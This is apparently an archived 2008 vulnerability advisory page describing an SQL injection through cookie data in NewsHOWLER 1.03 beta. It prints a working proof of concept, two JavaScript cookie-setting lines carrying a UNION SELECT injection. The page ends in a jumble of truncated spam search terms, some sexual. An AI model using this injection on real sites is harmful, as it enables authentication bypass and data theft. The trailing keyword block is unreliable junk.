about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , NewsHOWLER Cookie Data SQL Injection Vulnerability


Title NewsHOWLER Cookie Data SQL Injection Vulnerability
Published 2008-08-18-12:00AM
Updated 2008-08-27-08:14PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  IRCRASH (R3d.W0rm (Sina Yazdanmehr))
Vulnerable  Net Dupe NewsHOWLER 1.03 beta
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following exploit is available:javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";
javascript:document.cookie = "news_password=3; path=/";
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Mon, 07 Dec 2009 10:11:40 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
japan girl 200 /compo chinacctvj Sex photo MUMTAJ A...sgalle www.yuzewi Girl on Gi jordan kan mambo Remo 9fi.cn video wome www.kar20. lo619l www.worlds phpmyprofi www.bhqich 92mei.blog xp bypass Www.thresa sex videos www.worlds www.artech 3gp sex vi 2BSEX%2BVI www.bollyw www.zhmf51 XXXSEX SEXO AO V phpbb foru www .sex.1 www.junjun 9158tiaowu iis 5 root sex videos Display fr 200 /compo 200 /compo tamil actr www.yuzewi www.bollyw joomla com Sexy dream mambo Remo lo723l Sexyphotos 9152.vrvr. sexy indea zeroboard. readfile